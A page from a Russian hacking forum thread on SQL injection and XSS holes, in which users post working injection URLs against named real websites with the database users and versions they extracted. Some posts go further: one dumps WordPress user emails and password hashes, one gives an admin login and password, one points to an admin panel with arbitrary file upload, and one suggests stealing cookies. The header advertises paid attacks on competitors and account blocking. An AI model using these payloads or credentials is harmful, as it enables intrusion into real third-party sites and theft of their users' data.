Уязвимости SQLi, XSS и другие.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 22 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#211

04.01.2016, 13:53

blackhead

Новичок

Регистрация: 11.08.2015

Сообщений: 28

С нами: 5661686

Репутация: 0

Код:

http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),version(),4+--

DORTEKARREBAEK_@10.246.64.149

5.5.47-MariaDB-1~wheezy

Код:

http://www.afmec.org/admin/index.php?msg=alert("LOL")

Код:

http://www.trex.uqam.ca/index.php?action=alert("LOL")

#212

05.01.2016, 21:26

R3hab

Участник форума

Регистрация: 17.05.2015

Сообщений: 117

С нами: 5785526

Репутация: 6

Meghalaya Board of School Education

SQLi

Код HTML:

http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_name),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f

PR 3

AR 796,284

5.5.36-cll

#213

07.01.2016, 19:37

ph03nix

Новичок

Регистрация: 07.01.2016

Сообщений: 4

С нами: 5447126

Репутация: 0

http://websurf.ru/signup.php

Поле: Ваше имя

Код:

">alert('HakNet')

http://id.ykt.ru/page/register

Поле: Ник в сети Ykt.Ru

Код:

">alert('HakNet')

#214

08.01.2016, 17:52

ph03nix

Новичок

Регистрация: 07.01.2016

Сообщений: 4

С нами: 5447126

Репутация: 0

http://lawyerstars.ru/

Во все поля

Код:

">alert('Ph03niX')

#215

13.01.2016, 14:12

blackhead

Новичок

Регистрация: 11.08.2015

Сообщений: 28

С нами: 5661686

Репутация: 0

1. Target: courtnews.co.nz PR 3

Type: SQLi

Код:

http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--

hooked_hooked@localhost

5.1.73-cll

На сайте есть блог wp, можно попробовать украсть куки через XSS

Код:

http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C657274282758585827293C2F7363726970743E,3+--

2. Target:beloboka.ru ТИЦ 60

Type: SQLi

Код:

http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--

beloboka@localhost

5.6.19-log

Админка http://beloboka.ru/beloboka/cp

Пароль и логин в базе. В админке есть возможность залить любой файл.

#216

31.01.2016, 21:09

Шниперсон

Познающий

Регистрация: 14.05.2015

Сообщений: 63

С нами: 5789846

Репутация: 3

Type: SQLi

http://www.banknotymira.ru/?nav=pozition&id=-6074'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12, 13'-- -

http://www.banknotymira.ru/admin

admin - login

15182 - password

bkmir_u43895@localhost

#217

31.01.2016, 21:18

nordwarrior

Новичок

Регистрация: 12.12.2015

Сообщений: 13

С нами: 5484566

Репутация: 2

SQL-i

Код:

http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users--

#218

09.03.2016, 23:40

Filipp

Участник форума

Регистрация: 10.05.2015

Сообщений: 251

С нами: 5795606

Репутация: 31

XSS-reflected:

Код:

http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

#219

25.03.2016, 11:40

atata

Участник форума

Регистрация: 09.11.2015

Сообщений: 137

С нами: 5532086

Репутация: 1

http://www.oldtown-apartments.com/index.php?cat=1 and (select 1 from (Select count(*),Concat((select user()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)&id=14